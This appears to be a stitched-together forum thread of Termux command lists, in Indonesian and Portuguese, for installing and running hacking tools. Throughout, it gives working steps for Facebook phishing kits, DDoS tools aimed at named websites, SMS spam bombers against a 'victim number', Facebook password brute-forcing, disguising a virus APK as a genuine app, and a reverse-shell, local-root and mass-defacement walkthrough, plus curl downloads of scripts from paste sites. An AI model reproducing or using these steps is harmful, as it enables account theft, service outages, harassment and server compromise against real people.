*Weeman* ) $ apt update && apt upgrade -y $ apt install git -y $ apt install python2 -y $ git clone https://github.com/evait-security/weeman $ cd weeman $ chmod 777 weeman.py $ python2 weeman.py Contoh $ set url http://facebook.com $ set action_url http://facebook.com run (Bisa diganti phising nya, kalau Twitter ya bisa ataupun yg lain) *Ikuti Langkah Demi Langkah* (````Install``` *Hunner framework*) $ apt update $ apt install python $ apt install git -y $ git clone https://github.com/b3-v3r/Hunner $ cd Hunner $ chmod 777 hunner.py $ python hunner.py Ikuti Langkah Demi Langkah (```Install``` *SQLMAP*) $ apt update $ apt install python $ apt install python2 $ apt install git $ gi clone https://github.com/sqlmapproject/sqlmap $ cd sqlmap $ Python2 sqlmap.py Exemple:- Python2 sqlmap.py -u website --dbs -D acuart --tables -D acuart -T users --columns -D acuart -T users -C name,email,phone -dump Ikuti Langkah Demi Langkah Lacak ip git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IP yang ingin dilacak bbom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjh --------------------------------------------------------------------- *1.Spammer SMS Grab Install Spammernya dulu* $pkg install python2 $pip2 install requests $pkg install git $git clone https://github.com/p4kl0nc4t/Spammer-Grab $cd Spammer-Grab $ls $chmod +x spammer.py $python2 spammer.py --delay 30 nomor korban. --------------------------------------------------------------------------------------- *Cara Install Lazymux di Termux* $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Gameye98/Lazymux $ cd Lazymux $ chmod +x lazymux.py $ python2 lazymux.py --------------------------------------------------------------------------------------- *2.Cara install tools daijobu* Fungsinya nanti liat sendiri lah di dalem tools nya $apt upgrade && apt update $apt install php $apt install git Kalo udah selesai langsung masukan git nya dengan perintah $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php --------------------------------------------------------------------------------------- 3. Install webdav $ apt update && upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ ln -s /sdcard $ cd sdcard $ mkdir webdav $ cd webdav $ curl -k -O https://pastebin.com/raw/HnVyQPtR $ mv HnVyQPtR webdav.py $ python2 webdav.py --------------------------------------------------------------------------------------- *2. Xerxes* $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 --------------------------------------------------------------------------------------- *3. Torshammer* $ pkg update $ pkg install git $ Pkg install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py -T -t seword.com ( web y ang kalian attack ) #mr khanz'''TOOL TERMUX Cara Install D-tect tool di android termux (command ) : $ apt install git $ apt install python2 $ git clone https://github.com/shawarkhanethicalhacker/D-TECT $ ls $ cd D-TECH $ chmod +x d-tect.py $ python2 d-tect.py cara uninstall tool termux rm -rf toolsnya cara buat virus cd /sdcard cd vbug ls chmod vbug.py chmod -v vbug.py python2 vbug.py irssi /connet irc.freenode.net /nick w3wandroid /join #modol _________________________ DDOS via Termux 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 104.27.146.125 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py _________________________________________ Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy ________________________________________ musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak musik ________________________________________ Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah ________________________________________ Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya _______________________________________ Menampilkan animasi kereta :v $ pkg install sl $ sl _______________________________________ menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch _______________________________________ menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya _______________________________________ $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dgn mengetik nomornya.  Tutorial membuat virus seperti aplikasi aslinya🚨 Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug https://www.mediafire.com/file/6hs6y71ryw10uvw/vbug.zip 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. Jadi deh auto boot fb git clone https://github.com/Senitopeng/BotFbBangDjon.git cd BotFbBangDjon python2 bangdjon.py melihat id fb https://findmyfbid.in/ git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction cara membuat virus cd Vbug/vbug.py cd /storage/emulated/0/Vbug cd vbug Python2 vbug.py CRACK PASSWORD HASH git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ cd FHX-Hash-Killer python2 FHXHashKiller.py git clone https://github.com/UltimateHackers/Hash-Buster $ cd Hash-Buster $ python2 hash.py pkg install irssi irssi (enter) /connect chat.freenode.net /nick oki /join #mrmaze Cara install Metasploit di termux (No Root) ~ apt update && apt upgrade ~ apt install curl ~ curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh ~ chmod +x metasploit.sh ~ ./metasploit.sh ... Tunggu proses instalasi sekitar 30-40 menit tergantung koneksi internet ... ( hack fb via termux ) $apt update $apt upgrade $apt install python2 $apt install python2-dev $apt install wget $dip2 install mechanize $cd/sterage/emulated/0 $python2 fbbrute.py ( yg tdi di download di tunda di luar folder ) $storage/emulated/0/fassword.txt ( sama kya yang tadi di download trus tinda di luar folder ) =tinggal tunggu fassword nya muncul Jika beruntung *silahkan mencoba* tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools pip install mps_youtube pip install youtube_dl apt install mpv mpsyt /judul $ pkg update && pkg upgrade CHATTING VIA TERMUX $ pkg install irssi $ irssi $ /connect chat.freenode.net $ /nick 1235 12345 di ganti sesuai nama/nick agan $ /join #XCAteam 100% work boom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjhj +6282399188718 Spam bom mall $ pkg install update $ pkg install upgrade $ pkg install wget $ pkg install php $ wget http://files-store.theprivat.ml/uploads/bom-mall.zip $ unzip bom-mall.zip $ cd bom-mall $ php run.php (```Install``` *SpamTsel*) $ pkg install curl $ pkg install php $ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php $ chmod 777 bombtsel.php $ php bombtsel.php 3) Tool Spam LITESPAM $ pkg install php $ pkg install toilet $ pkg install sh $ pkg install git $ git clone https://github.com/4L13199/LITESPAM $ cd LITESPAM $ sh LITESPAM.sh atau bash LITESPAM.sh Masukan Nomer nya... VBugMaker Termux -apt update && apt upgrade -apt install git -apt install python Donwload file ->http://upfile.mobi/YGwg8gQLuvv Pindah ke directory Next -unzip vbug.zip -mv vbug $HOME -cd vbug -ls -chmod +x vbug.py -python2 vbug.py #Done Cara Root Server Di Termux Dengan Ngrok Perl/PHP BackConnecter Mass Deface. 1. Install~ Buka Termux 2. Install Ngrok Registrasi Autthokennya. (http://ngrok.com/download;http://ngrok.com/signup) $ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip $ unzip ngrok-stable-linux-arm.zip ngrok $ ./ngrok authtoken JWJDKNxxxxxxxxxx $ ./ngrok tcp port :~# Welcome : Plan Free "0.tcp.ngrok.io:port-ngrok ~> localhost:port" 3. Download Perl/PHP Backconnecter (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) dan Edit file nya, cari $ip dan $port ganti dengan (0.tcp.ngrok.io:port-ngrok) ~>Upload ke website (PERL: ON)(PHP: ON) 5. in termux command : $ nc -lnvp port 6. in backdoor shell : $ perl perl-reverse-shell.pl (atau) > http://situs.co.li/perl-reverse-shell.php (Run the script simply by browsing to the newly uploaded file in your web browser) .----(after backconnect successfully)--- 7. upload LOCALROOT $ wget https://domain.com/localroot/dirty $ chmod 777 dirty $ ./dirty New password: ndasmu (successfully rooted) 8. import TTY shell ===>jika menggunakan dirty<=== $ echo "import pty; pty.spawn('/bin/bash')" > /tmp/sad.py $ python /tmp/sad.py ===>jika menggunakan cowroot<=== $ python -c 'import pty;pty.spawn("/usr/bin/passwd")' (https://evertpot.com/189/) .-------------------------------------------- 9. login as ROOT $ su rintoar Password: ndasmu .-------------------------------------------- 10 ./mass (https://m.youtube.com/watch?v=HPQQok40v78) .-------------------------------------------- WEEMAN [✓] apt update && apt upgrade -y apt install git -y apt install python2 -y git clone https://github.com/evait-security/weeman cd weeman chmod 777 weeman.py python2 weeman.py Ex set url http://facebook.com set action_url http://facebook.com run ___________________________________________ Hunner framework apt update apt install python apt install git -y git clone https://github.com/b3-v3r/Hunner cd Hunner chmod 777 hunner.py python hunner.py ___________________________________________ SQLMAP [✓] apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap cd sqlmap Python2 sqlmap.py ______ Exemplo Python2 sqlmap.py -u website –dbs -D acuart –tables -D acuart -T users –columns -D acuart -T users -C name,email,phone -dump ___________________________________ DDOS XERXES [✓] clang xerxes.c -o xerxes ./xerxes website 80 ___________________________________ DDOS TORSHAMMER [✓] apt-get update apt-get install python2 apt-get install tor apt-get install git git clone https://github.com/dotfighter/torshammer.git cd torshammer python2 torshammer.py -T -t website ___________________________________ BRUTEFORCE [✓] apt update apt upgrade apt install python apt install pip pip install wordlist apt install worlist Wordlist -h cd /sdcard Cat pas.txt ___________________________________ Localizar ip Apt install python git git clone https://github.com/maldevel/IPGeoLocation.git cd IPGeoLocation chmod +x ipgeoLocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t http://www.google.com ___________________________________ Hecker RECONDOG apt update apt install python python2 apt install git git clone https://github.com/UltimateHackers/ReconDog cd ReconDog chmod +x dog.py Python2 dog.py ___________________________________ BUSCA PAINEL ADM DE SITE pkg install git git clone https://github.com/Techzindia/admin_penal cd admin_penal chmod +x admin_panel_finder.py python2 admin_panel_finder.py ___________________________________ HAKKU apt install pytho apt install git mkdir vasu git clone https://github.com/4shadoww/hakkuframework cd hakkuframework chmod +x hakku python hakku show modules use whois show options set target examplesite.com run ___________________________________________ RED HAWK apt update apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK cd RED_HAWK chmod +x rhawk.php apt install php ls php rhawk.php ___________________________________________ D-TECT apt update apt install git git clone https://github.com/shawarkhanethicalhacker/D-TECT cd D-TECT apt install python2 chmod +x d-tect.py python2 d-tect.py examplesite.com ___________________________________________ viSQL apt update apt install python2 apt install git git clone https://github.com/blackvkng/viSQL cd viSQL python2 -m pip install -r requirements.txt python2 viSQL.py python2 viSQL.py -t http://www.bible-history.com __________________ Hash Buster apt update apt upgrade apt install python2 apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster python2 hash.py PERKIRAAN cuaca curl http://wttr.in/ (lokasi) tool Routersploit apt install git apt install python2 pip2 install requests git clone https://github.com/reverse-shell/routersploit.git cd routersploit pip install -r requirements.txt termux-fix-shebang rsf.py Cara pake cd routersploit ./ rsf.py use scanners/autopwn show options set target 192.168.1.1 set port 8080 set threads 10 masukkan exploitsnya set target 192.168.1.1 -check -run tool ubuntu $ apt update $ apt install git $ apt install wget $ apt install proot $ git clone https://github.com/Neo-Oli/termux-ubu… $ cd termux-ubuntu $ chmod +x ubuntu.sh $ ./ubuntu.sh $ ./start.sh (```Install``` *Weeman* ) $ apt update && apt upgrade -y $ apt install git -y $ apt install python2 -y $ git clone https://github.com/evait-security/weeman $ cd weeman $ chmod 777 weeman.py $ python2 weeman.py Contoh $ set url http://facebook.com $ set action_url http://facebook.com run (Bisa diganti phising nya, kalau Twitter ya bisa ataupun yg lain) *Ikuti Langkah Demi Langkah* (````Install``` *Hunner framework*) $ apt update $ apt install python $ apt install git -y $ git clone https://github.com/b3-v3r/Hunner $ cd Hunner $ chmod 777 hunner.py $ python hunner.py Ikuti Langkah Demi Langkah (```Install``` *SQLMAP*) $ apt update $ apt install python $ apt install python2 $ apt install git $ gi clone https://github.com/sqlmapproject/sqlmap $ cd sqlmap $ Python2 sqlmap.py Exemple:- Python2 sqlmap.py -u website --dbs -D acuart --tables -D acuart -T users --columns -D acuart -T users -C name,email,phone -dump Ikuti Langkah Demi Langkah Lacak ip git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IP yang ingin dilacak bbom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjh --------------------------------------------------------------------- *1.Spammer SMS Grab Install Spammernya dulu* $pkg install python2 $pip2 install requests $pkg install git $git clone https://github.com/p4kl0nc4t/Spammer-Grab $cd Spammer-Grab $ls $chmod +x spammer.py $python2 spammer.py --delay 30 nomor korban. --------------------------------------------------------------------------------------- *Cara Install Lazymux di Termux* $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Gameye98/Lazymux $ cd Lazymux $ chmod +x lazymux.py $ python2 lazymux.py --------------------------------------------------------------------------------------- *2.Cara install tools daijobu* Fungsinya nanti liat sendiri lah di dalem tools nya $apt upgrade && apt update $apt install php $apt install git Kalo udah selesai langsung masukan git nya dengan perintah $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php --------------------------------------------------------------------------------------- 3. Install webdav $ apt update && upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ ln -s /sdcard $ cd sdcard $ mkdir webdav $ cd webdav $ curl -k -O https://pastebin.com/raw/HnVyQPtR $ mv HnVyQPtR webdav.py $ python2 webdav.py --------------------------------------------------------------------------------------- *2. Xerxes* $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 --------------------------------------------------------------------------------------- *3. Torshammer* $ pkg update $ pkg install git $ Pkg install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py -T -t [8/11 18.11] BOT X3NONOLIMIT: Hack FACEBOOK *apt update && apt upgrade *pkg install python2 && pkg install wget *pip2 install mechanize && pip2 install request *pkg install git *git clone https://github.com/tikuskecil/multi-bruteforce-facebook *cd multi-bruteforce-facebook *ls *python2 MBF.py
Juanhacker051
*FotoSploit* $ git clone https://github.com/Cesar-Hack-Gray/FotoSploit $ cd FotoSploit $ chmod +x * $ bash install sh $ ./FotoSploit $ show options ================================================= *instalar metasploit no termux(Facilmente)* comandos para instalar metasploit no termux 1: apt update && apt upgrade 2: apt install curl 3: curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh 4: ls 5: chmod 777 metasploit.sh 6: ls 7: ./metasploit.sh (Carregandooooo) 8: msfconsole ================================================= *EchoPwn* Instalação git clone https://github.com/hackerspider1/EchoPwn.git cd EchoPwn chmod +x install.sh EchoPwn.sh ./install.sh EchoPwn.sh ================================================= *DarkFly-Tool* Instalação apt update && apt upgrade apt install git git clone https://github.com/Ranginang67/DarkFly-Tool cd DarkFly-Tool chmod +x * python2 install.py ================================================= *Tool-x* Instalação apt update apt install git git clone https://github.com/rajkumardusad/Tool-X.git cd Tool-X chmod +x install.aex sh install.aex ou ./install.aex ================================================= *Multi_Phish* pkg instalar droplet pkg instalar openssh pkg instalar git pkg instalar curl pkg instalar wget apt instalar git php -y git clone https://github.com/perjayro/MultiPhish.git cd phish chmod 777 phish.sh bash phish.sh ================================================= *Pentest Tools Framework* git clone https://github.com/pikpikcu/Pentest-Tools-Framework.git cd Pentest-Tools-Framework pip install -r require.txt python install.py python ptf.py ================================================= *Destroyer-framework* ⭕️LINUX git clone https://github.com/Cesar-Hack-Gray/Destroyer-framework cd Destroyer-framework ls bash install.sh ./Destroyer ⭕️TERMUX apt upgrede -y && pkg update -y apt install -y apt install -y curl apt install git git clone https://github.com/Cesar-Hack-Gray/Destroyer-framework cd Destroyer-framework ls bash install.sh ./Destroyer ================================================= *NIKTO* Instalação git clone https://github.com/sullo/nikto apt-get install openssl libcrypt-ssleay-perl Uso de proxys: perl nikto.pl -h localhost -p 8080 -useproxy proxyIp Atualizando Nikto: perl nikto.pl -update ================================================= *SocialFish* Instalação $ apt update && upgrade $ apt install git $ apt install python2 $ git clone https://github.com/UndeadSec/SocialFish.git $ cd SocialFish $ chmod +x * $ pip2 install -r requirements.txt ================================================= *Opal [ATUALIZADO]* git clone https://github.com/shadowlabscc/ProjectOpal.git cd ProjectOpal python opal.py python Injector.py ================================================= *Kit de ferramentas para bugbounty. #CVEs* https://github.com/Medicean/VulApps https://github.com/qazbnm456/awesome-cve-poc https://github.com/tunz/js-vuln-db https://github.com/cve-search/cve-search https://github.com/nixawk/labs https://github.com/Coalfire-Research/java-deserialization-exploits https://github.com/Metnew/uxss-db https://github.com/TH3xACE/SUDO_KILLER https://github.com/Mr-xn/Penetration_Testing_POC https://github.com/toolswatch/vFeed ================================================= *Para pegar informações* 1️⃣ Phone In Foga https://github.com/sundowndev/PhoneInfoga 2️⃣ In Foga - Email https://github.com/m4ll0k/Infoga 3️⃣ Angry Fuzz3r https://github.com/ihebski/angryFuzzer 4️⃣ Hakku Framework https://github.com/4shadoww/hakkuframework 5️⃣ Knock Mail https://github.com/4w4k3/KnockMail 6️⃣ Santet Online https://github.com/Gameye98/santet-online 7️⃣ The Harvester https://github.com/laramies/theHarvester 8️⃣ Optiva Framework https://github.com/joker25000/Optiva-Framework 9️⃣ Cyber Scan https://github.com/medbenali/CyberScan 🔟 Gloom Framework https://github.com/StreetSec/Gloom-Framework ================================================= *OXID Tools* git clone https://github.com/oxyda-fox/OXIDTools.git cd OXIDTools chmod +x * . /setup.sh . /run.sh ================================================= *xShock* Instalação git clone https://github.com/capture0x/xShock/ cd xShock pip3 install -r requirements.txt Executar python3 main.py ================================================= *Web Pentest* Instalação apt update && apt upgrade apt install git apt install python2 apt install python git clone https://github.com/cr4shcod3/pureblood cd pureblood chmod +x * pip install -r requirements.txt Uso python2 pureblood.py ================================================= *Quack* Requisitos apt update && apt upgrade -y termux-setup-storage pkg install -y git pkg install -y python pip install --upgrade pip pip install requests Instalação git clone https://github.com/entynetproject/quack cd quack pip install -r requirements.txt chmod +x quack ================================================= *Thoron Framework* git clone https://github.com/entynetproject/thoron.git cd thoron chmod + x install.sh ./install.sh ================================================= *BlackPhish* git clone https://github.com/Ahmedmahmed8a/BlackPhish cd BlackPhish bash installer.sh ================================================= *RapidPayload* git clone https://github.com/AngelSecurityTeam/RapidPayload cd RapidPayload bash install.sh python3 RapidPayload.py ================================================= *Termux_ExtraKeys* apt update && apt upgrade -y apt install git -y git clone https://github.com/Fabrix07Hack/Termux_ExtraKeys.git cd Termux_ExtraKeys chmod 777 * ./extrakeys_Termux ================================================= *PyReconExSploit* apt-get update apt-get upgrade apt-get install exploitdb netcat nmap perl php git clone https://github.com/AkutoSai/PyReconExSploit cd PyReconExSploit/ python3 setup.py install cp -r /home/user/Desktop/PyReconExSploit/pyreconexsploit /usr/local/lib/python3.7/dist-packages pyreconexsploit ================================================= *Evil Framework* apt update apt upgrade pip2 install requests git clone https://github.com/LOoLzeC/Evil-create-framework cd Evil-create-framework python2 vcrt.py show android help Escolha um virus create virus"seu virus" SET OUTPUT cd /sdcard SET VIRUS NAME "nome do seu virus" run ================================================= *Wifite* apt update && apt upgrade apt install git apt install python2 git clone https://github.com/derv82/wifite2 ls cd wifite ls python2 wifite.py ================================================= *MALICIOUS* $ termux-setup-storage $ cd /sdcard $ apt install git $ apt install python2 $ apt install ruby $ gem install lolcat $ git clone https://github.com/Hider5/Malicious $ cd Malicious $ pip2 install -r requirements.txt $ python2 malicious.py ================================================= *Hammer* apt update apt-get install python -y apt install git apt install python3 git clone https://github.com/cyweb/hammer ls cd hammer chmod +x hammer.py python3 hammer.py -s (alvo) -p 80 -t 150 ================================================= *VIRUS X* $ apt update && apt upgrade $ apt install git $ apt install python $ git clone https://github.com/TSMaitry/VirusX.git $ cd VirusX $ chmod +x VirusX.py $ python2 VirusX.py ================================================= *INFECT* $ apt-get update -y $ apt-get upgrade -y $ apt install python -y $ apt install python2 -y $ apt install git -y $ pip install lolcat $ git clone https://github.com/noob-hackers/Infect $ ls $ cd infect $ ls $ bash infect.sh ================================================= *F-Society Framework* (Instalação) apt install git apt install python2 (Instalação do pacote) git clone https://github.com/Manisso/fsociety ls cd fsociety ls chmod +x fsociety.py ./install.sh python2 fsociety.py ================================================= *MyServer* Abra o termux e digite os seguintes comandos. apt update apt install git git clone https://github.com/rajkumardusad/MyServer cd MyServer chmod +x install ./install ================================================= *AirCrack-ng* apt update apt install root-repo apt install aircrack-ng ================================================= *RouterSploit* apt update && apt upgrade apt install python -y pip2 install apt install git git clone https://github.com/threat9/routersploit ls cd routersploit pip2 install -r requirements -dev.txt pip install future ls python rsf.py ================================================= *Shell Phish* apt update apt upgrade -y termux-setup-storage apt installl git git clone https://github.com/thelinuxchoice/shellphish cd shellphish apt installl php apt install curl git clone https://github.com/PSecurity/ps.ngrok cd ps.ngrok mv ngrok /data/data/com.termux/files/home/shellphish/ cd .. rm -rf ps.ngrok chmod +x ngrok chmod +x shellphish.sh bash shellphish.sh # Ao Iniciar: cd shellphish bash shellphish.sh comandos : pkg install clang git clone https://github.com/XCHADXFAQ77X/XERXES ls cd XERXES ls chmod +x * ls clang xerxes.c -o xerxes ./xerxes exemplo: website.com.br 80 galera lembrando nao bote HTTPS nem www so o nome do site exemplo : website.com.br ``` ALGUNS COMANDOS DO TERMUX BY: BAN``` apt update && apt upgrade termux-setup-storage apt install git apt install net-tools apt install termux-tools apt install neofetch apt install ncurses-utils apt install curl curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh chmod +x metasploit.sh ./metasploit.sh msfconsole ____________________________________________ https://github.com/PSecurity/ps.ngrok termux-setup-storage apt update && apt upgrade -y pkg update && pkg upgrade -y apt install curl pkg install git git clone https://github.com/PSecurity/ps.ngrok cd ps.ngrok mv ngrok /data/data/com.termux/files/home cd .. chmod +x ngrok ./ngrok ( chave de ativação NGROK) ./ngrok http 80 ________________________________________________ apt update Apt install python2 Apt install git Git clone https://github.com/evait-security/weeman ls cd weeman chmod +x * python2 weeman.py Set url (url) set action_url (url) run (→Abra outra página←) cd .. ./ngrok http 8080 ____________________________________________ apt update apt upgrade apt git git clone https://github.com/liorvh/hammer-1 cd hammer-1 chmod +x * python hammer.py python hammer.py -s (site + www) -t 256 -p 80 ___________________________________________________ apt install git Pkg install clang Faça a instalação do Script git clone https://github.com/zanyarjamal/xerxes Entre no diretório cd xerxes Digite o comando clang xerxes.c -o xerxes Agora e só inicia o Ataque ./xerxes website.com 80 ____________________________________________ apt update && apt upgrade apt install php apt install python2 apt install toilet apt install git git clone https://github.com/4L13199/LITESPAM cd LITESPAM ls sh LITESPAM.sh As opções aparecerão como mostrado abaixo, você apenas escolhe qual bomba de spam SMS será executada ____________________________________________ $ pkg update $ pkg upgrade $ pkg install git $ pkg install php $ pkg install toilet $ pkg install python2 $ gem install lolcat $ pip2 install requests $ pip2 install termcolor $ git clone https://github.com/mbest99/MIXINGS.git $ cd MIXINGS $ bash 0ppay.sh Features:- [ 1] PHISING V1 [ 2] PHISING V2 [ 3] PHISING V3 [ 4] PHISING V4 [ 5] PHISING GAME [ 6] Hack fb target [ 7] Hack fb massal [ 8] Hack fb Target+Massal [ 9] Hack FB ans (#root) [10] Hack Instagram (#root) [11] Hack Twitter (#root) [12] Hack Gmail (#root) [13] Fb Info [14] Santet Online [15] Spam IG [16] Spam WA [17] Spam Sms [18] Youtube AutoView (#root) ____________________________________________ No termux, pra adiantar... pkg install nodejs Em seguida, crie um aplicativo e guarde o nome dele https://www.heroku.com/ $ pkg install git -y $ termux-setup-storage $ ls $ git clone -b herooku https://github.com/XploitWizer/XploitSPY $ cd XploitSPY $ ls $ pkg install nodejs $ npm install heroku -g $ heroku login -i $ heroku git:remote -a nomedoapp $ heroku buildpacks:add heroku/jvm $ heroku buildpacks:add heroku/nodejs $ git push heroku herooku:master ____________________________________________ PERSONALIZAR TERMUX apt update && apt upgrade -y pkg install nano pkg install vim cd ../usr/etc ls vim bash.bashrc Precione a letra (I) para editar o texto Depois vc apaga a seguinte mensagem que aparece no termux " PS1='\$ ' " E cola isso → PS1="\033[1;32m ╔\033[0m""\033[1;31m[ \033m""\033[1;32m SEU NOME AKI\033[0m""\033[1;31m @\033[0m""\033[1;32m║\033[0m""\033[1;37m ≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡\033[0m""\033[1;32m ╚▶ " Coloca o seu nome onde tá escrito " seu nome aqui" Para sair vc clica no ESC + : + x aí você dê enter. Depois de o comando exit e dê enter, dps é só abrir dnovo ;> ____________________________________________ pkg update && pkg upgrade $pkg install python2 $pip2 install requests $pip2 install mechanize $pkg install git $git clone https://github.com/ARIYA-CYBER/NEW $cd NEW $python2 FbNew.py ____________________________________________ https://github.com/Paxv28/CrusherDDoS apt install git apt install python cd CrusherDDoS chmod +x Setup.sh ./Setup.sh python CSDDoS.py
MGz-Staze
Cara Update dan Upgrade Termux pkg update && pkg upgrade Tools Pendukung untuk Termux Tools pendukung yang di perlukan agar tools yang lain work. <—-| PENTING pkg install git php curl -y pkg install python2 pkg install apache2 Trik Termux Untuk mematikan atau memberhentikan tools tekan tombol volume bawah (-) + C secara bersamaan Untuk memunculkan commands sebelumnya tekan tombol volume bawah + P Menampilkan Tombol ESC, HOME, CTRL dan lainnya Tekan Tombol volume atas + Q script termux Menampilkan Matrix Ini cuma menampilkan angka dan huruf berjatuhan, terlihat keren •pkg install cmatrix cmatrix mempercantik termux Note : Jika ada pertanyaan saat install, silahkan ketik tombol y lalu enter saja, agar proses install dapat berjalan dengan lancar. Ratusan Tools Termux Sebagian dari Kali Linux •pkg install git •git clone https://github.com/Mrcakil/mrcakil •cd mrcakil •chmod +x tools •./tools ratusan tools termux Bermain atau Memunculkan Kereta Api pkg install sl sl main termux Bot Auto Reaction Facebook •git clone https://github.com/AMVengeance/FB-React.git •chmod +x FB-React -R cd FB-React •./start fb react Bot Love Instagram •git clone https://github.com/indogram/indotagram.git •php indotagram/login.php Masukkan username dan password instagram untuk memunculkan cookie Kemudian copy dan paste kode cookie ke website penyedia bot instagram disini bot instagram NIK dan KK Gratis •pkg install php git •git clone https://github.com/IndonesiaSecurity/kkktp •cd kkktp php •kkktp.php Menjalankan Musik di Termux pkg install mpv mpv /lokasi/musik/musik.mp3 cara memutar musik di termux Menampilkan Informasi System pkg install neofetch neofetch tampilan informasi Membuat Tulisan atau Teks Besar di Termux pkg install figlet figlet initulisannya cara membuat tulisan nesar di termux Crack hash password git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ cd FHX-Hash-Killer python2 FHXHashKiller.py Cara Menginstall Metasploit di Termux Metasploit adalah tools hacking yang dapat di gunakan untuk kegiatan seperti remote pc atau hp orang lain, membuat virus, menyadap dan lain sebagainya. Cara Install dan Menjalankannya pkg install curl curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh chmod +x metasploit.sh ./metasploit.sh Cara Install Wifite di Termux Android Wifite adalah salah satu tool yang berfungsi untuk wireless attack, seperti mengcrack atau membobol password wifi yang terkunci dengan wpa/wpa2, Cara Install Wifite git clone https://github.com/derv82/wifite cd wifite chmod 777 wifite.py Cara Menjalankan Wifite python2 wifite.py Bruteforce Bruteforce ini metode hacking yang dimana kita akan membuat suatu wordlist yang berisi kumpulan tebakan password, jika ada salah satu password yang sesuai maka akun bisa di dapatkan. pkg install pip pip install wordlist pkg install worlist wordlist 